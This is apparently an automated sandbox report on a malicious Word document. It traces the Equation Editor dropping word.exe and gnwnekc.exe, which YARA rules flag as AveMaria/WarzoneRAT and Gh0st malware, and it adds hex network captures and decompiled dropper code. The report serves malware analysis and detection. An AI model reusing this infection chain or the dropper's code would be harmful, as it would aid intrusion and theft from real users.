2023-01-05 11:32:58 UTC	128	IN	Data Raw: 93 66 1a b1 d8 65 28 e0 14 af ad c2 c0 ec 0f 0f ad 1b 99 92 25 e5 91 42 ad 06 97 b8 97 30 fb a3 07 a9 05 4f 7a 4b be 63 1a 25 78 02 e8 a1 3b 1e e1 63 e4 c9 94 60 6e 84 3b 4a 8e 0c 04 3c 81 1a 6d 95 61 4f a3 3f 3a e6 1f 78 be 9f 7f 9e 76 43 03 c8 6f e0 1b f2 95 d7 32 ac 7d 95 a5 32 13 ec ed d7 34 c4 0e c8 68 23 02 16 fe ef c5 79 70 8c f2 74 dd 8c 9b bc 2e 22 57 e5 a8 59 5d 7e 91 e0 dd 6f 2d 8b 4c 5d e8 da 83 b3 e7 e3 fe e9 73 47 ff 9b 4a c6 9a 6f da 5e 4f 57 ec 7a ad 77 f8 0e 6c 81 49 44 56 51 74 79 9e 58 ed db 6b a6 87 e4 58 b7 8b 86 cb c7 6c d7 b9 ad f5 d0 49 ac 30 3c c9 e6 68 27 23 ec b7 cc 2d ae 27 fd f5 b9 35 c4 ef 8f 4a 7c 00 b5 ca f5 aa 1a e5 b6 5a 9e 2e 5a fd 89 ee 5e ba 2b 0d 17 2e ec 30 9a 37 bd 39 49 35 b2 56 49 9e 83 ca 0c e1 67 f8 68 99 a6 c9 Data Ascii: fe(%B0OzKc%x;c`n;J<maO?:xvCo2}24h#ypt."WY]~o-L]sGJo^OWzwlIDVQtyXkXlI0<h'#-'5J\|Z.Z^+.079I5VIgh
2023-01-05 11:32:59 UTC	144	IN	Data Raw: f3 15 8c 28 8a ce d6 8a a8 9c 1b 1c af d4 8a 05 07 0c a3 d1 91 95 7b 3a 55 53 e8 7c 53 a7 73 07 af 9e 62 d8 51 69 37 67 b7 08 be 5f 4a f5 02 7e 2c 7e 83 22 65 90 6c cb 8e 9b e0 d5 8d 83 fc 7e 64 ef d6 5b 1d 95 60 dc c0 ed e2 4f 6b d8 4f 8a 29 7f 11 d6 ee ff e1 cb b7 a4 21 08 e1 d5 27 59 f2 b2 97 c1 1f 48 36 ec b5 23 9d 39 0e 49 fe 86 60 10 a8 56 bf 7e 25 02 48 22 9f 6f ba b2 34 a0 5c e5 1b 9f bc f9 17 ae bc 3b 87 69 24 76 5b 65 1e 26 10 2d 50 5a cd 47 eb 77 21 da a8 01 69 e7 c0 b9 30 2b ab 61 30 94 60 a6 b4 24 77 13 48 f7 a5 d9 81 5d 2f 5c e3 ab dd da b3 4a d8 3e 92 9a 0a 2c bb ed 00 5b a6 5d dd f4 37 42 bc dc ff 0d f1 aa 78 d8 19 bf ec 11 30 46 4d 03 a0 84 bd ba 0f 0c 35 25 78 3f 42 16 cc 62 40 c0 06 12 b6 de a0 7c 25 98 5b 96 19 c2 e9 d5 8a 79 e2 e0 08 Data Ascii: ({:US\|SsbQi7g_J~,~"el~d[`OkO)!'YH6#9I`V~%H"o4\;i$v[e&-PZGw!i0+a0`$wH]/\J>,[]7Bx0FM5%x?Bb@\|%[y
2023-01-05 11:32:59 UTC	160	IN	Data Raw: d3 ab 14 e8 f7 0b 81 15 fb 6e f0 a7 eb a8 0e cc 34 06 c9 7c cf 98 8a 59 44 6c 62 e4 84 c1 0f 4b d7 bd 46 45 eb 4a da 03 64 a1 1e 2c 64 38 56 04 dd 88 08 26 97 ca a4 cd 2c 6a c9 ff 92 b8 94 19 06 0a 50 43 4d 86 f2 19 cf 5c b6 e6 6f ec 48 70 82 de a3 d4 d4 3a 40 35 89 e7 56 22 7d c4 3c ab 56 e0 b2 84 37 8c 20 f1 3f e3 d9 b1 0d ca d0 a9 5b c0 f8 7c 40 63 43 ef 9e 27 2e cc 80 a7 f2 e3 20 75 b6 8a 13 1e 9f d0 a1 18 aa dd 3d df a7 63 05 51 9a ed 2d 43 b9 89 15 3e 9a 88 c5 8d bb 59 1c 58 7e 03 6a e7 4a 97 09 3a 8b 39 12 7b 56 a2 22 2c 4c c5 87 7d 38 f0 d3 35 b5 bc 07 25 66 20 64 fb 52 27 f7 52 29 79 82 a6 59 70 38 ea 90 92 7a fd d5 78 b5 42 28 74 2c 6e d6 59 8d 76 3b cd 30 a9 89 a3 3f c4 fe c7 0b 43 dd 5e 97 e2 f9 53 3d 4c 6d e2 6e b6 e1 0f 9c 42 9a e0 1b 04 33 Data Ascii: n4\|YDlbKFEJd,d8V&,jPCM\oHp:@5V"}<V7 ?[\|@cC'. u=cQ-C>YX~jJ:9{V",L}85%f dR'R)yYp8zxB(t,nYv;0?C^S=LmnB3
2023-01-05 11:32:59 UTC	176	IN	Data Raw: 70 66 da 9f 1e 12 e8 56 1d a8 44 71 57 2c 37 9f ca c4 89 e2 d7 b0 1a e2 ad 9f 92 f4 c1 01 18 25 53 50 b1 50 44 37 86 a2 96 d4 0d 87 b9 82 e3 48 f6 79 13 d8 18 37 5b 74 9e 1d e5 7b 70 f1 4b 53 bb 4f 3f 76 aa db 16 a8 c3 52 cc 1c a7 05 22 cd d3 d3 6c ec 7b e2 c8 24 05 c3 c1 09 2f 7d 1b 28 c6 9f 13 64 63 47 88 78 5b 5b 9d 85 fa 5b c4 ef d7 d9 e1 18 51 80 e1 96 fa dc 41 69 0c d7 42 8d 75 41 7e 9d fc 22 b4 df ca 2d ac 34 9a 25 3d 5c a6 c3 8a cd c5 7d 2c f2 7c 91 c9 2f 1d 75 4a 83 77 4c a4 cd a4 34 9a 8b d7 b7 6c 32 17 3a bf 3c 3b 94 aa f6 c5 ac 17 92 e7 9f 19 3a 81 fa 7d da 56 ed 79 3d e2 3d c5 79 82 ca 02 f3 68 af c9 86 c1 6d 02 eb 5b 9c 37 3d 48 cc bd f0 e4 ca e6 e7 34 25 f6 ca 3c c3 b4 35 7b 02 30 36 07 aa b3 07 4b 13 ad f9 e6 97 12 12 68 9d 3e df 85 67 e8 Data Ascii: pfVDqW,7%SPPD7Hy7[t{pKSO?vR"l{$/}(dcGx[[[QAiBuA~"-4%=\},\|/uJwL4l2:<;:}Vy==yhm[7=H4%<5{06Kh>g
2023-01-05 11:32:59 UTC	192	IN	Data Raw: 43 8a fe cb c0 6b 6b 48 29 f3 40 a1 cc 03 8c 67 50 64 f1 91 67 5a 3d 1c 7e ae 0b ab 34 58 f2 12 b5 76 a2 a9 4e e9 47 63 dd 84 8e eb da b7 92 0d 5a 76 dd 49 f5 cd 4c b8 b8 85 34 06 04 96 e8 33 c2 7b fb a6 e7 da 8f 13 25 f2 a4 ba 0f 66 06 ef 08 0a c2 c3 76 de 33 2c 7b f9 e1 95 39 fa 0a 0b 06 51 7d eb f2 e3 ca 19 9d 67 ae b1 86 ef e6 a7 f4 b7 7d 29 13 3d 04 1d e1 38 de 22 2e 42 4d f3 71 ea 88 42 48 8d 5f b5 15 29 26 3d fb 5e 4b 91 6e d2 ae ff cf ea da fd e1 dd e4 bd 5a fe 3d 86 bd 46 bb 2a 06 35 ea b1 9e 7b cb d3 15 30 59 fe 80 25 a7 3b a0 b2 aa ec 14 6f f1 b5 e3 3b 45 05 d3 0f ef 6b 8a 05 ba 75 a7 6f 5f d8 7f 34 84 e1 df 14 9d a0 07 06 17 6c 81 ef 34 24 dc a7 0f 67 d1 57 02 1d 66 41 7c 86 15 da ed a9 eb 0c f3 5d 3e 80 79 63 d0 7c 98 9e 7c 64 71 b7 41 5b c2 Data Ascii: CkkH)@gPdgZ=~4XvNGcZvIL43{%fv3,{9Q}g})=8".BMqBH_)&=^KnZ=F*5{0Y%;o;Ekuo_4l4$gWfA\|]>yc\|\|dqA[
2023-01-05 11:32:59 UTC	208	IN	Data Raw: 4f 20 6e 10 fd 6c dd 29 cd 12 55 72 b4 29 41 dc 7b fb 0a e0 48 b5 6d 2e be 0d f4 4c a0 5a 5f 5e 38 10 0e 65 29 60 89 e0 53 e1 30 08 53 28 3a fe 30 c5 15 72 62 9b 3a a5 4e 15 fe 90 ed 25 09 49 ff 6a e7 40 c0 fa 2d 59 6c 06 73 3d a0 9a e8 2a 47 36 95 64 75 f8 26 34 55 06 33 20 ea 99 89 86 35 eb 09 aa 30 2c 14 61 9d 7b 84 91 9b b9 d5 a8 e2 79 d6 1e 0d 08 b9 1e 59 fa db 03 73 36 a6 f8 04 85 ae ea 28 2c b9 02 c5 50 4b c2 b1 68 cb 87 27 15 3c 0e 84 2d ce b3 59 51 cb 12 c6 a9 7c 78 f5 9c 20 d9 b6 0a ca 30 89 d5 8c ae 97 4b b8 23 9e da 07 2a 7b fd 6c f7 31 87 8d ee 42 1b 1b 29 a9 85 d9 65 ad 88 31 a7 e7 ee d8 a9 c6 87 ec 90 ee ae f3 b0 0b a7 ac be 58 fa 96 a8 3b 80 78 6b 58 cc ac f0 42 a1 2c 3f 24 b8 2c 32 cf 63 06 7c 1f ec a2 3b 15 fa 5a ca 3f 25 c9 1b b1 eb 73 Data Ascii: O nl)Ur)A{Hm.LZ_^8e)`S0S(:0rb:N%Ij@-Yls=G6du&4U3 50,a{yYs6(,PKh'<-YQ\|x 0K#{l1B)e1X;xkXB,?$,2c\|;Z?%s

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXEPID: 2820, Parent PID: 576

General

Target ID:	0
Start time:	12:32:12
Start date:	05/01/2023
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f700000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: EQNEDT32.EXEPID: 2724, Parent PID: 576

General

Target ID:	2
Start time:	12:32:13
Start date:	05/01/2023
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: word.exePID: 1968, Parent PID: 2724

General

Target ID:	5
Start time:	12:32:17
Start date:	05/01/2023
Path:	C:\Users\user\AppData\Roaming\word.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\word.exe
Imagebase:	0x400000
File size:	226038 bytes
MD5 hash:	5A474DC9553AA8A2FDB2996CA48C99B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: gnwnekc.exePID: 508, Parent PID: 1968

General

Target ID:	6
Start time:	12:32:18
Start date:	05/01/2023
Path:	C:\Users\user\AppData\Local\Temp\gnwnekc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v
Imagebase:	0x400000
File size:	86528 bytes
MD5 hash:	5985907FDAB0FFD71DFBB1A96598D2D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_WarzoneRAT, Description: Detects AveMaria/WarzoneRAT, Source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: AveMaria_WarZone, Description: unknown, Source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: gnwnekc.exePID: 2052, Parent PID: 508

General

Target ID:	8
Start time:	12:32:20
Start date:	05/01/2023
Path:	C:\Users\user\AppData\Local\Temp\gnwnekc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\gnwnekc.exe
Imagebase:	0x400000
File size:	86528 bytes
MD5 hash:	5985907FDAB0FFD71DFBB1A96598D2D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_WarzoneRAT, Description: Detects AveMaria/WarzoneRAT, Source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: AveMaria_WarZone, Description: unknown, Source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000003.913528927.00000000008D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000000.911229292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: AveMaria_WarZone, Description: unknown, Source: 00000008.00000000.911229292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000008.00000003.913307044.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000008.00000003.913307044.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000008.00000000.911346295.0000000000418000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000008.00000000.911346295.0000000000418000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000003.913357063.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000003.913377903.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wwpicppqkrphnp.exePID: 1580, Parent PID: 1860

General

Target ID:	9
Start time:	12:32:33
Start date:	05/01/2023
Path:	C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe" "C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\A
Imagebase:	0x400000
File size:	86528 bytes
MD5 hash:	5985907FDAB0FFD71DFBB1A96598D2D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: EQNEDT32.EXEPID: 852, Parent PID: 576

General

Target ID:	13
Start time:	12:32:37
Start date:	05/01/2023
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: word.exePID: 1968, Parent PID: 2724COMMON

Execution Graph

Execution Coverage:	15.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.4%
Total number of Nodes:	1385
Total number of Limit Nodes:	25

Executed Functions

Function 00403640 Relevance: 84.4, APIs: 34, Strings: 14, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				intOrPtr* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				signed int _t233;
				WCHAR* _t234;

				0x435000 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t179 = E00406A35(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069C5(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406668(0x429260, L"NSIS Error");
				E00406668(0x435000, GetCommandLineW());
				_t94 = 0x435000;
				_t233 = 0x22;
				 *0x42a260 = 0x400000;
				if( *0x435000 == _t233) {
					_t94 = 0x435002;
				}
				_t198 = CharNextW(E00405F64(_t94, 0x435000));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F64(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406668(0x435800, _t198);
										L37:
										_t234 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E0040360F(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2f4 == _t188) {
														L77:
														_t119 =  *0x42a30c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A35(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t188) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t264);
												goto L68;
											}
											_t218 = E00405F64(0x435000, _t188);
											if(_t218 < 0x435000) {
												L48:
												_t263 = _t218 - 0x435000;
												_v8 = L"Error launching installer";
												if(_t218 < 0x435000) {
													_t189 = E00405C33(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t137 = lstrcmpiW(_t234, 0x436800);
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t234);
														__eflags =  *0x435800;
														if( *0x435800 == 0) {
															E00406668(0x435800, 0x436800);
														}
														E00406668(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\Albus\\AppData\\Roaming\\word.exe", 0x420f08, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E00406428(_t201, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t152 = E00405C4B(0x420f08);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E0040603F(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406668(0x435800, _t221);
												E00406668(0x436000, _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= 0x435000) {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E0040360F(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E0040360F(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}

0x0040364e
0x0040364f
0x00403656
0x00403659
0x00403660
0x00403663
0x00403676
0x0040367c
0x0040367f
0x00403682
0x00403690
0x00403698
0x004036a3
0x004036bc
0x004036be
0x004036c6
0x004036c6
0x004036d1
0x004036d3
0x004036d3
0x004036e8
0x0040370d
0x0040371b
0x0040371e
0x00403725
